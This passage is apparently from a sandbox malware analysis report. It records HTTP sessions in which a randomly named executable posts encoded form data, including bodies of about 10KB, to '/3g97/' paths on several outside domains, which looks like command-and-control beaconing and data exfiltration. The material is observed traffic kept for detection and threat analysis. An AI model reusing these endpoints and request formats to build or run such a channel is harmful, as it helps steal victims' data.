19 | 192.168.2.4 | 49760 | 217.160.0.111 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:27:38.330450058 CEST | 10830 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.carliente.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.carliente.com
                                                                                              Referer: http://www.carliente.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:27:38.641844988 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Date: Wed, 24 Apr 2024 05:27:38 GMT
                                                                                              Server: Apache
                                                                                              Content-Encoding: gzip
Apr 24, 2024 07:27:38.641876936 CEST | 846 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49761 | 217.160.0.111 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:27:41.169056892 CEST | 455 | OUT | GET /3g97/?AlB=sdJPX&12l42=pss1I4hPKcXAgTeMienjdKFyes9H9oPLrlXUMEqkxJwN3Lu9fPUDc8IPlpsJO9uNl7TAjBTqm2QSFPkGLslINQQyxLsDbCNKxleUNo2npjmmo3Auov63B2Q= HTTP/1.1
                                                                                              Host: www.carliente.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:27:41.479784966 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 4545
                                                                                              Connection: close
                                                                                              Date: Wed, 24 Apr 2024 05:27:41 GMT
                                                                                              Server: Apache
Apr 24, 2024 07:27:41.479814053 CEST | 1289 | IN
Apr 24, 2024 07:27:41.479831934 CEST | 1289 | IN
Apr 24, 2024 07:27:41.479857922 CEST | 816 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49762 | 64.190.62.22 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:27:47.299001932 CEST | 740 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.paydayloans3.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.paydayloans3.shop
                                                                                              Referer: http://www.paydayloans3.shop/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=zWFBAKTQnSVineX6JVQk2m5v+G1wrGh47Yzz98pT/EFBXgjNbvddV4nVftyWJKDhIpW24+n+YPcm2ZhV0PTODhXryWc/bt3l7VPG5R/RF7Pt5KwzuB0PK76uivpfAA4iWAeO6iRP0O7Ct+FgbjpaiNOwAlQvuS3ZUT6kHX6ciG7FlpND5jJxg6Pk7HpfYOFpng==
Apr 24, 2024 07:27:47.604283094 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:27:47 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49763 | 64.190.62.22 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:27:50.139935970 CEST | 760 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.paydayloans3.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.paydayloans3.shop
                                                                                              Referer: http://www.paydayloans3.shop/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=zWFBAKTQnSViodP6Py8k+m4dzW1whmh07Y3z94xD/2hBWEnNYtldYYnVXNzSEqDUIpaU4/b+YP4m2b5Vz+TNDxXp62c5G93l7VPG5Rq+F7Xt5bgztg0MUr6tnvpfXQ4mWAe86mRl0L/Ct6BgbwxdrNO2dVQ8pxKnWyfJIVX/8H3dgvcZoSomy6rXmAgrVN4g8tlOtvyFZ3Rc8z6P1R4OF6o=
Apr 24, 2024 07:27:50.449489117 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:27:50 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49764 | 64.190.62.22 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:27:52.980545998 CEST | 10842 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.paydayloans3.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.paydayloans3.shop
                                                                                              Referer: http://www.paydayloans3.shop/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:27:53.285751104 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:27:53 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49765 | 64.190.62.22 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:27:56.800787926 CEST | 459 | OUT | GET /3g97/?12l42=+UthD+705U1ao7DlNG8D0XAg53Vx3iw389CE+agLgXg1A2DbEeFYSszaWdWCIKr2NLn015a/QKEJl6wBw76YOQKFwTcvF/Pv+Bjw8BucK5rNlKIw4A0tIOg=&AlB=sdJPX HTTP/1.1
                                                                                              Host: www.paydayloans3.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:27:57.134358883 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                              date: Wed, 24 Apr 2024 05:27:56 GMT
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              transfer-encoding: chunked
                                                                                              vary: Accept-Encoding
                                                                                              x-powered-by: PHP/8.1.17
                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              pragma: no-cache
                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_FYvebS821B7iMhfNZ/w1gmKNORywM1xHMwIFgJro8gjUxuyZDDB0gTHyNFxY06mFm3hR7koL1z6+Ii61ArdNnA==
                                                                                              last-modified: Wed, 24 Apr 2024 05:27:56 GMT
                                                                                              x-cache-miss-from: parking-6fb6b6d5c7-zmw4w
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_FYvebS821B7iMhfNZ/w1gmKNORywM1xHMwIFgJro8gjUxuyZDDB0gTHyNFxY06mFm3hR7koL1z6+Ii61ArdNnA==><head><meta charset="utf-8"><title>paydayloans3.shop&nbsp;-&nbsp;paydayloans3 Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="paydayloans3.shop is your first and best source for all of the information youre looking for. Fro
Apr 24, 2024 07:27:57.134382963 CEST | 1289 | IN
                                                                                              Data Ascii: m general topics to more of what you would expect to find here, paydayloans3.shop has it all. We hope yAECou find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/
Apr 24, 2024 07:27:57.134408951 CEST | 1289 | IN
                                                                                              Data Ascii: idden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance
Apr 24, 2024 07:27:57.134422064 CEST | 1289 | IN
                                                                                              Data Ascii: ground:#273948;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.c
Apr 24, 2024 07:27:57.134497881 CEST | 1289 | IN
                                                                                              Data Ascii: ontent-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-
Apr 24, 2024 07:27:57.134512901 CEST | 1289 | IN
                                                                                              Data Ascii: n:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550
Apr 24, 2024 07:27:57.134588003 CEST | 1289 | IN
                                                                                              Data Ascii: 83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opac
                                                                                              Apr 24, 2024 07:27:57.134602070 CEST1289INData Raw: 6d 70 6f 72 74 61 6e 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e
                                                                                              Data Ascii: mportant;overflow:hidden}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:7%;flex-grow:1;width:300p
                                                                                              Apr 24, 2024 07:27:57.134722948 CEST1289INData Raw: 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75
                                                                                              Data Ascii: kground-position-y:top}.container-content--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-
                                                                                              Apr 24, 2024 07:27:57.134736061 CEST1289INData Raw: 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d
                                                                                              Data Ascii: }.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{tex
                                                                                              Apr 24, 2024 07:27:57.441720963 CEST1289INData Raw: 59 30 4e 7a 59 6d 64 47 4e 70 5a 44 31 33 64 33 63 75 63 47 46 35 5a 47 46 35 62 47 39 68 62 6e 4d 7a 4c 6e 4e 6f 62 33 41 32 4e 6a 49 34 4f 54 67 31 59 32 56 6b 4d 6a 6b 33 4f 53 34 33 4e 6a 55 35 4e 54 4d 7a 4d 69 5a 30 59 58 4e 72 50 58 4e 6c
                                                                                              Data Ascii: Y0NzYmdGNpZD13d3cucGF5ZGF5bG9hbnMzLnNob3A2NjI4OTg1Y2VkMjk3OS43NjU5NTMzMiZ0YXNrPXNlYXJjaCZkb21haW49cGF5ZGF5bG9hbnMzLnNob3AmYV9pZD0xJnNlc3Npb249RF9ocmM5WnZiLXhOS1E1Q3cyeHImdHJhY2txdWVyeT0x"},"imprintUrl":false,"contactUsUrl":false,"contentType":


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              25 | 192.168.2.4 | 49766 | 118.27.122.214 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Apr 24, 2024 07:28:03.112780094 CEST | 734 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.kansaiwoody.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.kansaiwoody.com
                                                                                              Referer: http://www.kansaiwoody.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=ABh2btSmsrxzQBbucAmOwNYZ80PfOEI1aF4Eq44haR/4obXRVtOgV3M6lElUDbtwAH87Cx+4wtU7wPWrg+loQIDE6p0p2OeV77F5ZDq4WYH3oafj4VXAUjneGMxRfwx3VGZo8YYEIIy5wKz4kwfV/QAxWRPJN2qVvemKfSL8g0m38gkzuP5YUa2J17k73KsJww==
                                                                                              Apr 24, 2024 07:28:03.388254881 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Wed, 24 Apr 2024 05:28:03 GMT
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Content-Encoding: gzip


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              26 | 192.168.2.4 | 49767 | 118.27.122.214 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Apr 24, 2024 07:28:05.904124022 CEST | 754 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.kansaiwoody.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.kansaiwoody.com
                                                                                              Referer: http://www.kansaiwoody.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=ABh2btSmsrxzKizubhmO2tYW50PfEkJ8aF0Eq8gxakP4o+zRbMOgZXM6xUlrO7t/AHwJCzq4wuo7wKqr1dNpT4DGj50r7ueV77F5ZHLtWYP3oJXjqhDfKznfFMxROAxzVGZW8YpMILa5wIb4qC3awQA3YxPXAWLLj+j7QymdvUix5m1p/+YPGaS6o8tP6JRAr/8KCPhaRIjhXMhudAczsI0=
                                                                                              Apr 24, 2024 07:28:06.164176941 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Wed, 24 Apr 2024 05:28:06 GMT
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Content-Encoding: gzip


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              27 | 192.168.2.4 | 49768 | 118.27.122.214 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Apr 24, 2024 07:28:08.740825891 CEST | 10836 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.kansaiwoody.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.kansaiwoody.com
                                                                                              Referer: http://www.kansaiwoody.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:28:09.008766890 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Wed, 24 Apr 2024 05:28:08 GMT
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Content-Encoding: gzip


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              28 | 192.168.2.4 | 49769 | 118.27.122.214 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Apr 24, 2024 07:28:11.543102026 CEST | 457 | OUT | GET /3g97/?AlB=sdJPX&12l42=NDJWYY+b4MJOe0SOZhyP3/gD5HDsZQ87d1VJjuxPOAPtwNnLRfPhezVGmkxSEIZ/YXBHCU3m0ogYj5Dd6IJsMpuoncQuveGk65BlZhCiT7/R0prs9m7zKG0= HTTP/1.1
                                                                                              Host: www.kansaiwoody.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:28:11.818558931 CEST | 359 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Wed, 24 Apr 2024 05:28:11 GMT
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              29 | 192.168.2.4 | 49770 | 34.149.87.45 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Apr 24, 2024 07:28:17.312788010 CEST | 743 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.corvidemporium.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.corvidemporium.com
                                                                                              Referer: http://www.corvidemporium.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=8ReNofe9EvAeM6JbXhT4CGCRrYGu9T9h7zSlKw3xsA4IyE6HMeU5GSa3QZ0ia5dohC0zGYSdZf9zjuUhaMxK8gKnSYBGMGs79i8SaCVgpfjAkm7pmHD/cRKGfby81ol2oCZRo7NTdVAHbJ5NGVcYwQQCfsD0kDxle6PyDxd2+xztTiy5TNTM+Kl0/8X8trirvg==
                                                                                              Apr 24, 2024 07:28:17.518404961 CEST | 1078 | IN | HTTP/1.1 403 Forbidden
                                                                                              Content-Length: 548
                                                                                              Content-Type: text/html
                                                                                              Server: Pepyaka
                                                                                              X-Wix-Request-Id: 1713936497.4153491690962646761
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Accept-Ranges: bytes
                                                                                              Date: Wed, 24 Apr 2024 05:28:17 GMT
                                                                                              X-Served-By: cache-bur-kbur8200132-BUR
                                                                                              X-Cache: MISS
                                                                                              X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb7CuzCCL+dj8TnMJldQo94o
                                                                                              Via: 1.1 google
                                                                                              glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                              Connection: close
                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49771 | 34.149.87.45 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:28:20.015732050 CEST | 763 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.corvidemporium.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.corvidemporium.com
                                                                                              Referer: http://www.corvidemporium.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=8ReNofe9EvAeMb5bVGn4EmCS1oGu3z967zWlKxDYtzMIyheHevU5Lya3b50rXZdVhC47GaWdZfpzjuEha9xJ6wKhZ4BABms79i8SaCBapf7AkVzpmjfwCBKJaby8nYlyoCZzo+U2dXoHbLxNGnkblgRJRMCisDBoe5qDNRVwngCPbEjjC8ybsKBHi7eIgofi0nU5tGzdpjWnKfEu39JTMIg=
Apr 24, 2024 07:28:20.231172085 CEST | 1079 | IN | HTTP/1.1 403 Forbidden
                                                                                              Content-Length: 548
                                                                                              Content-Type: text/html
                                                                                              Server: Pepyaka
                                                                                              X-Wix-Request-Id: 1713936500.12634899652302646765
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Accept-Ranges: bytes
                                                                                              Date: Wed, 24 Apr 2024 05:28:20 GMT
                                                                                              X-Served-By: cache-bur-kbur8200098-BUR
                                                                                              X-Cache: MISS
                                                                                              X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,9WD8GAcpJgs/Ng1WkD2i0h9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb7CuzCCL+dj8TnMJldQo94o
                                                                                              Via: 1.1 google
                                                                                              glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                              Connection: close
                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
